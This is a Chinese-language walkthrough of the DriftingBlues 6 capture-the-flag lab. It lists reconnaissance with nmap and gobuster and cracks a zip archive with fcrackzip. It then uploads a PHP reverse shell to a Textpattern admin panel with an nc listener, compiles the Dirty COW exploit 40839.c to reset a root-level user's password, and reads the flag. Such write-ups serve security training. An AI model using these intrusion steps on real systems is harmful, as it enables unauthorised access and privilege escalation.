Driftingblues 6

Driftingblues:6

一、基本信息

名称:DriftingBlues:6

发布日期:2021.3.30

作者:tasiyanci

系列:DriftingBlues

推特:@tasiyanci

二、靶机简介

Flags:

firefart:/root/flag.txt

难度:简单

三、文件信息

文件名:driftingblues6_vh.ova

文件大小:395MB

下载地址:

MD5: 1EF3EF660B6E129CCA3D93F8FBA0C94D

SHA1: 01EDAC6D7FFAD8B6487DD4DCE021CCFFD0250CE8

四、镜像信息

格式:Virtual Machine (Virtualbox - OVA)

操作系统:Linux(debain)

五、网络信息

DHCP服务:可用

IP地址:自动分配

六、环境配置

1.将靶机driftingblues6和攻击机kali2021在VirtualBox下设置为仅主机模式,使用DHCP分配ip地址:

image-

七、攻略步骤

信息探测

1.因为是没有直接告知我们靶机ip的,所以要先进行主机探测,先查看下kali分配到的ip,在进行网段扫描,命令如下,得到靶机ip为192.168.56.102:

1
ifconfig,查看kali分配到的ip

image-

1
nmap -sP 192.168.56.0/24,扫描靶机ip

image-

2.再进行端口扫描,发现只开放了80端口,访问主页查看源码,没有过多线索:

1
nmap -T4 -sC -sV -p- --min-rate=1000 192.168.56.118 | tee nmapscan,端口扫描

image-

image-

3.最后再进行一下目录扫描,发现有robots.txt文件:

1
gobuster dir -u http://192.168.56.118/ -x html,php,bak,txt --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt,目录扫描

image-

Zip密码爆破

1.访问192.168.56.118/robots.txt,得到/textpattern/textpattern目录存在的提示,同时提心我们关注.zip文件内容:

image-

2.继续访问192.168.56.118/textpattern/textpattern,发现是一个textpattern的管理后台登录页:

image-

3.根据提示,再次扫描目录,这次以.zip文件为主,找到spammer.zip:

1
gobuster dir -u http://192.168.56.118/ -x zip --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt,目录下.zip文件扫描

image-

4.利用fcrackzip对spammer.zip进行破解,可以得到zip内的一对用户名即密码:

1
fcrackzip -D -p rockyou.txt -u /home/kali/Downloads/spammer.zip

image-

image-

文件上传webshell

1.利用得到的用户和密码登录textpattern管理后台,发现在Content-File可以上传文件:

image-

2.我们可以上传kali自带的webshell,/usr/share/webshells/php/php-reverse-shell.php,修改ip及端口:

1
vim /usr/share/webshells/php/php-reverse-shell.php

image-

image-

3.在kali开启对应的端口监听,然后访问192.168.56.118/textpattern/files/php-reverse-shell.php触发:

1
nc -lvnp 9001
1
python -c 'import pty; pty.spwan("/bin/bash");',利用python建立交互式shell

image-

Linux内核漏洞提权

1.获取shell后,我们可以查看靶机系统内核,发现版本为3.2.78:

1
uname -a

image-

2.在kali上可以利用searchsploit搜索该版本漏洞,并且有对应的利用程序:

1
searchsploit linux 3.2.78

image-

3.获取利用程序后,我们可以查看,发现程序可以修改靶机内核版本下linux用户的登录密码:

1
2
searchsploit -m 40839.c
cat 40839.c

image-

4.再次通过textpattern后台上传40839.c,并在靶机/var/www/textpattern/files目录下对其编译,运行生成程序后修改密码:

image-

1
2
3
4
5
cd /var/www/textpattern/files
gcc -pthread 40839.c -o 40839 -lcrypt
./40839

123,修改后的password

image-

Flag获取

1.现在我们可以利用修改后的密码登录firefart用户:

1
su firefart

image-

2.在/root目录下,能够找到flag,即flag.txt:

1
2
3
cd /root
ls -la
cat flag.txt

image-